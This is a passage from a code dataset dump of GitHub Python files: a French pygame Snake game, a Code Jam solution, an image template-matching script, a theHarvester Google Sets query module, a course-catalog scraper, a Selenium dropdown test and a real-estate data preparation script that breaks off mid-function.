pygame.image.load(\"fruit.png\").convert_alpha() #Le fruit\nfruit = pygame.transform.scale(fruit, (35,35))\n\n#Récuperation de leur position\nposition_1 = head.get_rect()\nposition_fruit = fruit.get_rect()\n\n#Insertion des coordonnées de la tête dans leur liste respective\nx[0] = position_1.x\ny[0] = position_1.y\n\n#Position aléatoire est donnée au premier fruit, proche du joueur\nposition_fruit.x = randint(2,10)*step\nposition_fruit.y = randint(2,10)*step\n\n#Rafraichissement de l'écran\npygame.display.flip()\n\n#Variable qui continue la boucle principale du jeu\ncontinuer = True\ndepUp = depDown = depRight = depLeft = move_init = False\n#Changement de la variable de déplacement\nwhile(continuer):\n for event in pygame.event.get(): #Récupération des différents évènements du joueur\n if event.type == pygame.QUIT or (event.type == pygame.KEYDOWN and event.key == pygame.K_ESCAPE):#Vérification de si le joueur ne quitte pas le jeu\n continuer = False\n if event.type == pygame.KEYDOWN:#Vérification de si le joueur appuye sur une des touches du clavier\n\n if event.key == pygame.K_UP:\n if etat == 2: #Vérification de si le programme est à l'état de jeu\n if depUp == False and move_init == True:#Vérification que la direction soit différente et annonce que les déplacement on débutés\n if depDown == True:# Empêchement d'aller dans la direction opposée\n depUp == False\n else:\n depDown = depRight = depLeft = False #Changement de la variable de déplacement\n depUp = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_DOWN:\n if etat == 2:\n if depDown == False:# Empêchement d'aller dans la direction opposée\n if depUp == True:\n depDown == False\n else:\n depRight = depLeft = depUp = False #Changement de la variable de déplacement\n depDown = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_RIGHT:\n if etat == 1 and menu == 3:\n if size_barre >=0 and size_barre <=130:\n size_barre = size_barre + 10\n vitesse = vitesse - 7.5\n if etat == 2:\n if depRight == False: # Empêchement d'aller dans la direction opposée\n if depLeft == True:\n depRight == False\n else:\n depLeft = depUp = depDown = False #Changement de la variable de déplacement\n depRight = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_LEFT:\n if etat == 1 and menu == 3:\n if size_barre >=10 and size_barre <=140:\n size_barre = size_barre - 10\n vitesse = vitesse + 7.5\n if etat == 2:\n if depLeft == False:\n if depRight == True:# Empêchement d'aller dans la direction opposée\n depLeft == False\n else:\n depRight = depDown = depUp = False #Changement de la variable de déplacement\n depLeft = move_init = True\n pygame.mixer.Sound.play(bruit_mouvement)\n\n if event.key == pygame.K_RETURN:\n #Remplissage de l'écran en blanc pour effacer les parties du corps précédentes\n couverture.fill((250,250,250))\n fenetre.blit(couverture, (0,0))\n pygame.display.flip()\n\n if etat == 1:\n etat = 2\n\n #Remise de tous les paramètres du jeu à ceux de départ pour la nouvelle partie\n if etat == 3:\n depUp = depDown = depRight = depLeft = move_init = False\n length = 3\n for i in range (2, 1000):\n x[i] = y[i] = -100\n x[0] = y[0] = 0\n x[1] = -5\n y[1] = 5\n position_fruit.x = randint(2,10)*step\n position_fruit.y = randint(2,10)*step\n score = 0\n etat = 2\n\n #Définition d'une commande pour retourner au menu de depart apres avoir joué\n if event.key == pygame.K_SPACE:\n if etat == 1:\n if menu == 2 or menu == 3 or menu == 4:\n menu = 1\n if etat == 3: #Si le joueur perd\n depUp = depDown = depRight = depLeft = move_init = False #Les variables de déplacement deviennent fausses\n length = 3 #Remise de tous les paramètres du jeu à ceux de départ pour la nouvelle partie\n for i in range (2, 1000):\n x[i] = y[i] = -100\n x[0] = y[0] = 0\n x[1] = -5\n y[1] = 5\n position_fruit.x = randint(2,10)*step\n position_fruit.y = randint(2,10)*step\n score = 0\n etat = menu = 1\n\n if event.key == pygame.K_c: #Accès à la page des contrôles\n if etat == 1 and menu == 1:\n menu = 2\n\n if event.key == pygame.K_p:#Accès à la page des paramètres\n if etat == 1 and menu == 1:\n menu = 3\n\n if event.key == pygame.K_r:#Possibilité de remettre la vitesse à sa valeur initiale\n if etat == 1 and menu == 3:\n size_barre = 70\n vitesse = 75.0\n if event.key == pygame.K_w:#Accès à la page des crédits\n if etat == 1 and menu == 1:\n menu = 4\n\n #Etat du Menu principale\n if etat == 1:\n\n #Chargement du fond d'écran du menu\n couverture_menu = pygame.image.load(\"fond2.png\").convert()\n fenetre.blit(couverture_menu, (0,0))\n\n if menu == 1:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Explication au joueur de comment entre dans le jeu\n disp_text(\"Appuyez sur Entrer pour jouer\",390,320)\n\n #Explication au joueur de quels touches utiliser pour jouer\n disp_text(\"Appuyez sur C pour voir les\",390,360)\n disp_text(\"commandes\",390,380)\n disp_text(\"Appuyez sur P pour les\",390,420)\n disp_text(\"paramètres\",390,440)\n font14 = pygame.font.SysFont(None, 14)\n text = font14.render(\"Appuyez sur W pour les crédits\",True,(0,0,0))\n fenetre. blit(text, (320,470))\n pygame.display.flip()\n\n if menu == 2:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Explication au joueur comment jouer\n disp_text(\"Commandes de jeu :\",390,310)\n font18 = pygame.font.SysFont(None, 18)\n text = font18.render(\"Déplacements :\",True,(0,0,0))\n fenetre. blit(text, (300,330))\n controls = pygame.image.load(\"keypad.png\").convert_alpha()\n controls = pygame.transform.scale(controls, (90,80))\n fenetre.blit(controls, (340,350))\n disp_text(\"Appuyez sur échap pour quitter le\",390,445)\n disp_text(\"jeu\",390,460)\n\n #Explication au joueur comment sortir des menus\n font15 = pygame.font.SysFont(None, 15)\n text = font15.render((\"Appuyez sur espace pour retourner\"),True,(0,0,0))\n fenetre.blit(text,(305,475))\n pygame.display.flip()\n\n if menu == 3:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Mise en place du curseur pour modifier la vitesse du serpent\n disp_text(\"Vitesse de déplacement :\",390,320)\n pygame.draw.rect(fenetre,(235,51,36),(320,350,size_barre,15))\n pygame.draw.rect(fenetre,(0,200,0),(320,350,140,15),3)\n disp_text(\"Appuez sur <- et -> pour modifier\",390,380)\n disp_text(\"Appuyez sur R pour les\",390,430)\n disp_text(\"paramètres initiaux\",390,450)\n font15 = pygame.font.SysFont(None, 15)\n\n #Explication au joueur comment sortir des menus\n text = font15.render((\"Appuyez sur espace pour retourner\"),True,(0,0,0))\n fenetre.blit(text,(305,475))\n pygame.display.flip()\n\n if menu == 4:\n #Carré est déssiné pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(290,290,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(290,290,200,200),5)\n\n #Représentation des informations\n disp_text(\"Crédits:\",390,310)\n disp_text(\"Image tête du serpent: MegaPixel\",390,350)\n disp_text(\"Bruit du mouvement: Jeckkech\",390,380)\n disp_text(\"Bruit de collision: ProjectsU012\",390,410)\n disp_text(\"Voir README.md pour les liens\",390,440)\n\n #Explication au joueur comment sortir des menus\n font15 = pygame.font.SysFont(None, 15)\n text = font15.render((\"Appuyez sur espace pour retourner\"),True,(0,0,0))\n fenetre.blit(text,(305,475))\n pygame.display.flip()\n\n #Etat du jeu en cours\n if etat == 2:\n\n #Chargement des objets dans le jeu\n fenetre.blit(corps1, (-5,5))\n fenetre.blit(head, (0,0))\n\n #Coordonnées du morceau précédent données à chaque morceau\n for i in range(length-1,0,-1):\n x[i] = x[i-1]\n y[i] = y[i-1]\n\n couverture.fill((250, 250, 250)) #Remplissage de l'écran en blanc pour effacer les parties du corps précédentes\n for i in range(1,length): #Chargement du corps du serpent\n couverture.blit(corps1, (x[i], y[i]))\n\n # Modification de la position de la tête du serpent\n if depUp:\n y[0] = y[0] - step #Déplacement de la position de la tête\n fenetre.blit(couverture, (0,0)) #Chargement du fond d'écran, de la tête\n fenetre.blit(head, (x[0], y[0]))\n\n if depDown:\n y[0] = y[0] + step\n fenetre.blit(couverture, (0,0))\n fenetre.blit(head, (x[0], y[0]))\n\n if depRight:\n x[0] = x[0] + step\n fenetre.blit(couverture, (0,0))\n fenetre.blit(head, (x[0], y[0]))\n\n if depLeft:\n x[0] = x[0] - step\n fenetre.blit(couverture, (0,0))\n fenetre.blit(head, (x[0], y[0]))\n\n #Verification que le serpent ne touche pas les bords\n if x[0] < fenetre_rect.left:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n if x[0] + 35 > fenetre_rect.right:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n if y[0] < fenetre_rect.top:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n if y[0] + 35 > fenetre_rect.bottom:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n\n #Chargement du fruit\n fenetre.blit(fruit, position_fruit)\n\n #Verification de si le serpent touche un fruit\n if collision(x[0], y[0], position_fruit.x, position_fruit.y,35,25):\n position_fruit.x = randint(1,20)*step #Nouvelles coordonnées du fruit lorsqu'il est \"mangé\"\n position_fruit.y = randint(1,20)*step\n for j in range(0,length):\n \twhile collision(position_fruit.x, position_fruit.y, x[j], y[j],35,25):\n \t\tposition_fruit.x = randint(1,20)*step #Nouvelles coordonnées du fruit si les premieres insérés ont les même coordonnées que le corps du serpent\n \t\tposition_fruit.y = randint(1,20)*step\n length = length + 2\n score = score + 1\n\n #Vérification de si la tête du serpent touche un morceau du corps\n \n if collision(x[0], y[0], x[i], y[i],0,0) and move_init:\n pygame.mixer.Sound.play(bruit_collision)\n etat = 3\n\n #Ajout du score à l'écran\n disp_score(score)\n #Definition du meilleur score parmi les parties jouées\n if score > highscore:\n highscore = score\n\n pygame.display.flip()\n\n #Ajout d'un retard à la boucle pour obtenir la vitesse de déplacement voulue\n time.sleep (vitesse / 1000.0)\n\n #Etat de la partie terminée\n if etat == 3:\n\n #Chargement d'un cadre pour donner les informations au joueur\n pygame.draw.rect(fenetre,(0,255,0),(150,150,200,200))\n pygame.draw.rect(fenetre,(0,200,0),(150,150,200,200),5)\n\n #Chargement du score de la partie terminé dans le cadre\n disp_text(\"Score: \" + str(score),250,180)\n\n #Chargement du meilleur score parmi les parties réalisés dans le cadre\n disp_text(\"Meilleur score : \" + str(highscore),250,230)\n\n #Explication au joueur pour comment rejouer\n disp_text(\"Pour rejouer appuyez sur Entrer !\",250, 280)\n\n #Explication au joueur pour comment retourner au menu\n disp_text(\"Pour retourner au menu appuyez\", 250,305)\n disp_text(\"sur la barre d'espace !\",250,320)\n\n pygame.display.flip()\n\n#Sortie du jeu\npygame.quit()\n","repo_name":"tlemenestrel/Snake-Game","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":16584,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"31149620554","text":"from sys import stdin, stdout\nfrom fractions import Fraction\ncin, cout = stdin.readline, stdout.write\nfor t in xrange(1, int(cin())+1):\n n, l = map(long, cin().split())\n arr = map(long, cin().split())\n primes = dict()\n for i in xrange(l):\n for j in xrange(i,l):\n v = str(Fraction(arr[i],arr[j]))\n v_ = str(arr[i]) + '/' + str(arr[j])\n if v!='1' and v!=v_:\n values = v.split('/')\n primes[values[0]] = 0\n primes[values[1]] = 0\n e = arr[i]/long(values[0])\n primes[str(e)] = 0\n found = 0\n primes = sorted([long(prime) for prime in primes]) \n index = [0 for i in xrange(l+1)]\n for i in xrange(1,l):\n v = str(Fraction(arr[i-1],arr[i]))\n v_ = str(arr[i-1]) + '/' + str(arr[i])\n if v!='1' and v!=v_:\n values = v.split('/')\n index[i-1] = long(values[0])\n index[i+1] = long(values[1])\n index[i] = arr[i]/long(values[1])\n found = i\n for i in xrange(found, l):\n if index[i+1]==0:\n index[i+1] = arr[i]/index[i]\n for i in xrange(found, 0, -1):\n if index[i-1] == 0:\n index[i-1] = arr[i-1]/index[i]\n ans = \"\".join( chr(ord('A') + primes.index(num)) for num in index)\n cout(\"Case #%d: %s\\n\"%(t, ans)) ","repo_name":"phantomhieve/CP","sub_path":"2019/codejam/Qualifiers/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"9399811228","text":"\"\"\"\nName: Carlos Meza\nDescription:\n Using two images of different sizes, find the smaller(template image) within the bigger(main image)\n using the match template function from skimage feature.\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom skimage.feature import match_template\n\n# Function for displaying image\ndef show_images(n, image, title):\n plt.figure(n)\n plt.imshow(image, cmap = plt.cm.gray)\n plt.title(title)\n\n# Convert an image into greyscale\ndef rgb2gray(rgb):\n return np.dot(rgb[...,:3], [0.2989, 0.5870, 0.1140])\n\n# Function that finds best match for the template in the main image\ndef findImage(mainImage, template) :\n # Read both images\n temp_main = mpimg.imread(mainImage)\n temp_small = mpimg.imread(template)\n \n # Convert both images into grayscale\n main = rgb2gray(temp_main)\n small = rgb2gray(temp_small)\n \n # Create an array of those pixel values\n main_data = np.array(main, dtype=None)\n template_data = np.array(small, dtype=None)\n \n # Print out both original images in greyscale\n show_images(0, main_data, \"Main Image w/ greyscale\")\n show_images(1, template_data, \"Template image w/ greyscale\")\n\n # Apply the match template function\n result = match_template(main_data, template_data, pad_input=True)\n \n # Variables to hold index values, size of half of template\n temp_row = int(len(template_data) / 2)\n temp_col = int(len(template_data[0]) / 2)\n rows = 0\n cols = 0\n temp = result[0][0]\n i = 0\n\n # Loop through main image and find highest correlation value as center\n while(i <= int(len(result)) - 1):\n k = 0\n while(k <= int(len(result)) - 1):\n if(result[i][k] > temp):\n temp = result[i][k]\n rows = i\n cols = k\n k += 1\n i += 1\n\n # Assign index values on main image to know area of template\n beg_row = rows - temp_row\n beg_col = cols - temp_col\n rows = rows + temp_row\n cols = cols + temp_col \n\n # Black out the image from the main image with index values\n main_data[beg_row:rows, beg_col:cols] = 0\n\n # Plot out final image with black square where template is found\n show_images(2, main_data, \"Main image w/ template removed\")\n plt.show()\n \n############# main #############\nif __name__ == \"__main__\":\n mainImage = \"ERBwideColorSmall.jpg\"\n template = \"ERBwideTemplate.jpg\"\n findImage(mainImage, template)\n","repo_name":"cmeza432/Template_Matching","sub_path":"templateMatching.py","file_name":"templateMatching.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"8529892059","text":"import myparser\r\nimport requests\r\n\r\nclass search_google_labs:\r\n\r\n def __init__(self, list):\r\n self.results = \"\"\r\n self.totalresults = \"\"\r\n self.server = \"labs.google.com\"\r\n self.hostname = \"labs.google.com\"\r\n self.userAgent = \"(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6\"\r\n id = 0\r\n self.set = \"\"\r\n for x in list:\r\n id += 1\r\n if id == 1:\r\n self.set = self.set + \"q\" + str(id) + \"=\" + str(x)\r\n else:\r\n self.set = self.set + \"&q\" + str(id) + \"=\" + str(x)\r\n\r\n def do_search(self):\r\n url = 'http://' + self.server + \"/sets?hl-en&\" + self.set\r\n headers = {\r\n 'Host': self.server,\r\n 'User-agent': self.userAgent\r\n }\r\n h = requests.get(url=url, headers=headers)\r\n self.results = h.text\r\n self.totalresults += self.results\r\n\r\n def get_set(self):\r\n rawres = myparser.parser(self.totalresults, list)\r\n return rawres.set()\r\n\r\n def process(self):\r\n self.do_search()\r\n","repo_name":"hkamran80/theHarvester","sub_path":"discovery/googlesets.py","file_name":"googlesets.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"}
+{"seq_id":"3443825733","text":"\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nimport json\r\n\r\n\r\ndef get_unique_key(url):\r\n return url \r\n\r\ndef make_request_using_cache(url):\r\n global header\r\n unique_ident = get_unique_key(url)\r\n\r\n ## first, look in the cache to see if we already have this data\r\n if unique_ident in CACHE_DICTION:\r\n print(\"Getting cached data...\")\r\n return CACHE_DICTION[unique_ident]\r\n\r\n ## if not, fetch the data afresh, add it to the cache,\r\n ## then write the cache to file\r\n else:\r\n print(\"Making a request for new data...\")\r\n # Make the request and cache the new data\r\n resp = requests.get(url, headers=header)\r\n CACHE_DICTION[unique_ident] = resp.text\r\n dumped_json_cache = json.dumps(CACHE_DICTION)\r\n fw = open(CACHE_FNAME,\"w\")\r\n fw.write(dumped_json_cache)\r\n fw.close() # Close the open file\r\n return CACHE_DICTION[unique_ident]\r\n\r\nclass CourseListing:\r\n def __init__(self, course_num, course_name):\r\n self.num = course_num\r\n self.name = course_name\r\n\r\n def init_from_details_url(self, details_url):\r\n global header\r\n page_text = make_request_using_cache(details_url)\r\n page_soup = BeautifulSoup(page_text, 'html.parser')\r\n self.description = page_soup.find(class_='course2desc').text\r\n\r\n def __str__(self):\r\n str_ = self.num + ' ' + self.name + '\\n\\t' + self.description\r\n return str_\r\n\r\nbaseurl = 'https://www.si.umich.edu'\r\ncatalogurl = baseurl + '/programs/courses/catalog'\r\nheader = {'User-Agent': 'SI_CLASS'}\r\npage_text = make_request_using_cache(catalogurl)\r\npage_soup = BeautifulSoup(page_text, 'html.parser')\r\nview_content_section = page_soup.find(class_='view-content')\r\ntable_rows = view_content_section.find_all('tr')\r\n\r\ncourse_listings = []\r\n# changing the loop for debugging -- test on a subset before doing all of them\r\n#for row in table_rows:\r\nfor i in range(4):\r\n row = table_rows[i]\r\n cells = row.find_all('td')\r\n if len(cells) == 2:\r\n course_num = cells[0].text.strip()\r\n course_name = cells[1].text.strip()\r\n # this gets rid of extra lines--only the first line of\r\n # multi-line names is kept\r\n course_name = course_name.split('\\n')[0].strip()\r\n # this gets rid of a trailing colon if it exists\r\n if course_name[-1] == ':':\r\n course_name = course_name[:-1]\r\n\r\n course_listing = CourseListing(course_num, course_name)\r\n details_url = baseurl + cells[0].find('a')['href']\r\n course_listing.init_from_details_url(details_url)\r\n course_listings.append(course_listing)\r\n\r\nfor cl in course_listings:\r\n print(cl)\r\n print('_'*40)","repo_name":"EMeireles/SI_206","sub_path":"Lecture Exercises/Lec9/lec13.py","file_name":"lec13.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"10180247349","text":"import time\nfrom selenium import webdriver\ndriver = webdriver.Chrome(executable_path=\"C:\\\\Users\\\\amit_pc\\\\Documents\\\\Study materials\\\\python\\\\Seleium\\\\chromedriver.exe\")\n\ndriver.get('https://rahulshettyacademy.com/dropdownsPractise/')\n\ndriver.maximize_window()\n\ndriver.find_element_by_id('autosuggest').send_keys('ind')\n\ntime.sleep(5)\n\nlist_country = driver.find_elements_by_css_selector(\"li[class='ui-menu-item'] a\")\n\nprint('length of country = ', len(list_country))\n\nfor country in list_country:\n #if country found is india then loop breaks out\n if country.text == 'India':\n country.click()\n break\n\nprint(driver.find_element_by_id('autosuggest').text)\n\nassert driver.find_element_by_id('autosuggest').get_attribute('value') == \"India\"\n\n\n#extract all the checkboxes in a single list so that it can be iterated in a for loop\ndriver.quit()","repo_name":"amits0003/Selenium_Study_Files","sub_path":"SeleniumTest/autosuggested_drop_down_test.py","file_name":"autosuggested_drop_down_test.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18967643511","text":"import json\nimport random\nfrom collections import OrderedDict\nfrom City_Data import city_data_service\n\n\n# Lade die Daten\ndef load_data(file_name):\n with open(file_name, 'r', encoding='utf-8') as file:\n loaded_data = json.load(file)\n return loaded_data\n\n\n# Sonderzeichen behandeln\ndef handle_special_characters(value):\n if isinstance(value, str): # Überprüfen, ob der Wert ein String ist\n # Umlaute umwandeln\n value = value.replace(\"ß\", \"ss\")\n value = value.replace(\"ä\", \"ae\")\n value = value.replace(\"Ä\", \"Ae\")\n value = value.replace(\"Ü\", \"Ue\")\n value = value.replace(\"ü\", \"ue\")\n value = value.replace(\"ö\", \"oe\")\n return value\n\n\n# Sonderzeichen in den geladenen Daten ersetzen\ndef handle_special_chars_in_data(loaded_data):\n decoded_data = []\n for dictionary in loaded_data:\n new_dict = {}\n for key, value in dictionary.items():\n new_dict[key] = handle_special_characters(value)\n decoded_data.append(new_dict)\n return decoded_data\n\n\n# Speichern der endgültigen Daten in eine JSON-Datei\ndef save_to_json(data, output_filename):\n with open(output_filename, 'w', encoding='utf-8') as file:\n json.dump(data, file, ensure_ascii=False, indent=2)\n\n\n# Daten splitten\ndef handle_datasplit(loaded_data):\n splitted_data = []\n for data in loaded_data:\n new_dict = {}\n for key, value in data.items():\n new_dict[key] = change_values_to_zero_one(key, value)\n splitted_data.append(new_dict)\n return splitted_data\n\n\n# Daten in Integer 0,1 umwandeln\ndef change_values_to_zero_one(key, value):\n if isinstance(value, bool): # Überprüfen ob der Wert Boolean ist\n value = int(value)\n else:\n if isinstance(key, str):\n if key == \"roomCount\": # Raumanzahl verarbeiten\n value = value\n\n return value\n\n\n# Daten transformieren\ndef splitdata(loaded_data, attributeList):\n attribute_Map = OrderedDict() # Map mit gewählten Attributen aufbauen\n for attribute in attributeList:\n attribute_Map[attribute] = []\n for eintrag in loaded_data: # Map mit values füllen\n for attribute in attributeList:\n value = attribute_Map[attribute]\n if str(eintrag[attribute]) not in value: # Überprüfen auf doppelte Werte\n value.append(eintrag[attribute])\n attribute_Map[attribute] = value\n for eintrag in loaded_data:\n for key in attribute_Map:\n for value in attribute_Map[key]:\n eintrag[key + ' ' + str(value)] = 0 # Inital auf Null setzen\n eintrag[key + ' ' + str(eintrag[key])] = 1\n eintrag.pop(key)\n return loaded_data\n\n\n# Attribute entfernen\ndef pop_Attribute(loaded_data, attributeList):\n for eintrag in loaded_data:\n for attribute in attributeList:\n eintrag.pop(attribute, None)\n return loaded_data\n\ndef generate_features(data):\n loaded_data = data.copy()\n loaded_data = handle_special_chars_in_data(loaded_data)\n\n # Umwandeln der Attribute\n loaded_data = splitdata(loaded_data,\n ['houseType', 'bundesland']) # , 'stadt', 'livingSpace', 'houseType', 'bundesland'\n loaded_data = handle_datasplit(loaded_data)\n\n for data in loaded_data:\n data.update(city_data_service.get_location_statistics(data[\"Latitude\"], data[\"Longitude\"], data[\"year\"] + 2000))\n\n # Entfernen von Attributen\n loaded_data = pop_Attribute(loaded_data,\n ['stadtteil', 'plz', 'strasse', 'address', 'stadt', 'Latitude', 'Longitude'])\n\n return loaded_data\n\ndef main():\n input_filename_1 = '../Historical_Data/trainingData_located2010_2.json'\n input_filename_2 = '../Historical_Data/trainingData_located2011_2.json'\n input_filename_3 = '../Historical_Data/trainingData_located2012_2.json'\n input_filename_4 = '../Historical_Data/trainingData_located2013_2.json'\n input_filename_5 = '../Historical_Data/trainingData_located2014_2.json'\n input_filename_6 = '../Historical_Data/trainingData_located2015_2.json'\n input_filename_7 = '../Historical_Data/trainingData_located2016_2.json'\n input_filename_8 = '../Historical_Data/trainingData_located2017_2.json'\n input_filename_9 = '../Historical_Data/trainingData_located2018_2.json'\n input_filename_10 = '../Historical_Data/trainingData_located2019_2.json'\n input_filename_11 = '../Historical_Data/trainingData_located2020_2.json'\n input_filename_12 = '../Historical_Data/trainingData_located2021_2.json'\n output_filename = \"final_data_2.json\"\n\n # Lade die Daten ein\n loaded_data = load_data(input_filename_1)\n loaded_data.extend(load_data(input_filename_2))\n loaded_data.extend(load_data(input_filename_3))\n loaded_data.extend(load_data(input_filename_4))\n loaded_data.extend(load_data(input_filename_5))\n loaded_data.extend(load_data(input_filename_6))\n loaded_data.extend(load_data(input_filename_7))\n loaded_data.extend(load_data(input_filename_8))\n loaded_data.extend(load_data(input_filename_9))\n loaded_data.extend(load_data(input_filename_10))\n loaded_data.extend(load_data(input_filename_11))\n loaded_data.extend(load_data(input_filename_12))\n\n # Handle special characters\n loaded_data = handle_special_chars_in_data(loaded_data)\n\n # Umwandeln der Attribute\n loaded_data = splitdata(loaded_data,\n ['houseType', 'bundesland']) # , 'stadt', 'livingSpace', 'houseType', 'bundesland'\n loaded_data = handle_datasplit(loaded_data)\n\n for data in loaded_data:\n data.update(city_data_service.get_location_statistics(data[\"Latitude\"], data[\"Longitude\"], data[\"year\"] + 2000))\n\n # Entfernen von Attributen\n loaded_data = pop_Attribute(loaded_data, ['stadtteil', 'plz', 'strasse', 'address', 'stadt', 'Latitude', 'Longitude'])\n\n # Speichern der endgültigen Daten in eine JSON-Datei\n print(\"Udpated: \" + str(len(loaded_data)))\n save_to_json(loaded_data, output_filename)\n\n\ndef main_2():\n input_filename = 'final_data_2_timeline_fut.json'\n output_filename = \"final_data_3d_fut.json\"\n\n # Lade die Daten ein\n loaded_data = load_data(input_filename)\n\n # Handle special characters\n loaded_data = handle_special_chars_in_data(loaded_data)\n\n # Umwandeln der Attribute\n loaded_data = splitdata(loaded_data, ['houseType', 'bundesland'])\n loaded_data = handle_datasplit(loaded_data)\n\n max_id = 0\n for data in loaded_data:\n data.update(city_data_service.get_location_statistics(data[\"Latitude\"], data[\"Longitude\"], data[\"year\"] + 2000))\n if data[\"id\"] > max_id:\n max_id = data[\"id\"]\n\n # Entfernen von Attributen\n loaded_data = pop_Attribute(loaded_data,\n ['stadtteil', 'plz', 'strasse', 'address', 'stadt', 'Latitude', 'Longitude'])\n\n res_list = []\n for i in range(0, max_id):\n res_list.append(list())\n\n for data in loaded_data:\n #id = data.pop(\"id\")\n id = data[\"id\"]\n res_list[id - 1].append(data)\n\n run = 0\n while run < len(res_list):\n res_list[run] = sorted(res_list[run], key=lambda x: x[\"year\"])\n run += 1\n\n # Speichern der endgültigen Daten in eine JSON-Datei\n save_to_json(res_list, output_filename)\n\n\ndef get_equal(full_data_list):\n same_list = list()\n fst_data = full_data_list.pop(0)\n same_list.append(fst_data)\n run = 0\n while run < len(full_data_list):\n data = full_data_list[run]\n if fst_data[\"strasse\"] == data[\"strasse\"] and fst_data[\"stadt\"] == data[\"stadt\"] and \\\n fst_data[\"stadtteil\"] == data[\"stadtteil\"] and fst_data[\"plz\"] == data[\"plz\"]:\n same_list.append(full_data_list.pop(run))\n else:\n run += 1\n return same_list\n\n\ndef _split_in_training_and_test_data(total_data: list):\n training_data = list()\n test_data = list()\n for data in total_data:\n if random.random() <= 0.8:\n _add_random_order(training_data, data)\n else:\n _add_random_order(test_data, data)\n return training_data, test_data\n\n\ndef _add_random_order(data_list, elem):\n if random.random() > 0.5:\n data_list.append(elem)\n else:\n data_list.insert(0, elem)\n\n\ndef _build_raw_data_2():\n input_filename_1 = '../Historical_Data/trainingData_located2010_2.json'\n input_filename_2 = '../Historical_Data/trainingData_located2011_2.json'\n input_filename_3 = '../Historical_Data/trainingData_located2012_2.json'\n input_filename_4 = '../Historical_Data/trainingData_located2013_2.json'\n input_filename_5 = '../Historical_Data/trainingData_located2014_2.json'\n input_filename_6 = '../Historical_Data/trainingData_located2015_2.json'\n input_filename_7 = '../Historical_Data/trainingData_located2016_2.json'\n input_filename_8 = '../Historical_Data/trainingData_located2017_2.json'\n input_filename_9 = '../Historical_Data/trainingData_located2018_2.json'\n input_filename_10 = '../Historical_Data/trainingData_located2019_2.json'\n input_filename_11 = '../Historical_Data/trainingData_located2020_2.json'\n input_filename_12 = '../Historical_Data/trainingData_located2021_2.json'\n input_filename_13 = '../Historical_Data/trainingData_fut_2022.json'\n input_filename_14 = '../Historical_Data/trainingData_fut_2023.json'\n input_filename_15 = '../Historical_Data/trainingData_fut_2024.json'\n input_filename_16 = '../Historical_Data/trainingData_fut_2025.json'\n output_filename = \"final_data_2_timeline_fut.json\"\n\n # Lade die Daten ein\n loaded_data_1 = handle_special_chars_in_data(load_data(input_filename_1))\n loaded_data_2 = handle_special_chars_in_data(load_data(input_filename_2))\n loaded_data_3 = handle_special_chars_in_data(load_data(input_filename_3))\n loaded_data_4 = handle_special_chars_in_data(load_data(input_filename_4))\n loaded_data_5 = handle_special_chars_in_data(load_data(input_filename_5))\n loaded_data_6 = handle_special_chars_in_data(load_data(input_filename_6))\n loaded_data_7 = handle_special_chars_in_data(load_data(input_filename_7))\n loaded_data_8 = handle_special_chars_in_data(load_data(input_filename_8))\n loaded_data_9 = handle_special_chars_in_data(load_data(input_filename_9))\n loaded_data_10 = handle_special_chars_in_data(load_data(input_filename_10))\n loaded_data_11 = handle_special_chars_in_data(load_data(input_filename_11))\n loaded_data_12 = handle_special_chars_in_data(load_data(input_filename_12))\n loaded_data_13 = handle_special_chars_in_data(load_data(input_filename_13))\n loaded_data_14 = handle_special_chars_in_data(load_data(input_filename_14))\n loaded_data_15 = handle_special_chars_in_data(load_data(input_filename_15))\n loaded_data_16 = handle_special_chars_in_data(load_data(input_filename_16))\n\n highest_id = 0\n data_list = list()\n while len(loaded_data_2) > 0 or len(loaded_data_3) > 0 or len(loaded_data_4) > 0 or len(loaded_data_5) > 0 \\\n or len(loaded_data_6) > 0 or len(loaded_data_7) > 0 or len(loaded_data_8) > 0 or len(loaded_data_9) > 0 \\\n or len(loaded_data_10) > 0 or len(loaded_data_11) > 0 or len(loaded_data_12) > 0 or len(loaded_data_13) > 0 \\\n or len(loaded_data_14) > 0 or len(loaded_data_15) > 0 or len(loaded_data_16) > 0:\n print(len(loaded_data_2))\n if len(loaded_data_2) > 0:\n data_2 = loaded_data_2.pop(0)\n else:\n data_2 = None\n if len(loaded_data_3) > 0:\n data_3 = loaded_data_3.pop(0)\n else:\n data_3 